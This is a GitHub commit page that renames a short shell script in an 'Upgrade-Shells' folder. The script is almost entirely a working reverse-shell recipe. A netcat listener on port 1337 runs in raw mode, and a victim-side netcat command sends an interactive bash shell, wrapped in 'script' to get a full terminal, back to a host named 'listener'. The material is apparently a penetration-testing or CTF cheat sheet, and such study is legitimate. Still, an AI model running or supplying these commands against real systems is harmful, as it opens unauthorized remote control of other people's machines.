Rename using-script.sh to script.sh

This commit is contained in:
dade
2017-07-20 19:24:35 -07:00
committed by GitHub
parent 590fcc5bad
commit e81aae2a1b

5
Upgrade-Shells/script.sh Normal file
View File

@@ -0,0 +1,5 @@
# Listener
stty -echo raw ; nc -lp 1337; stty sane
# Victim
nc -c '/bin/bash -c "script /dev/null"' listener 1337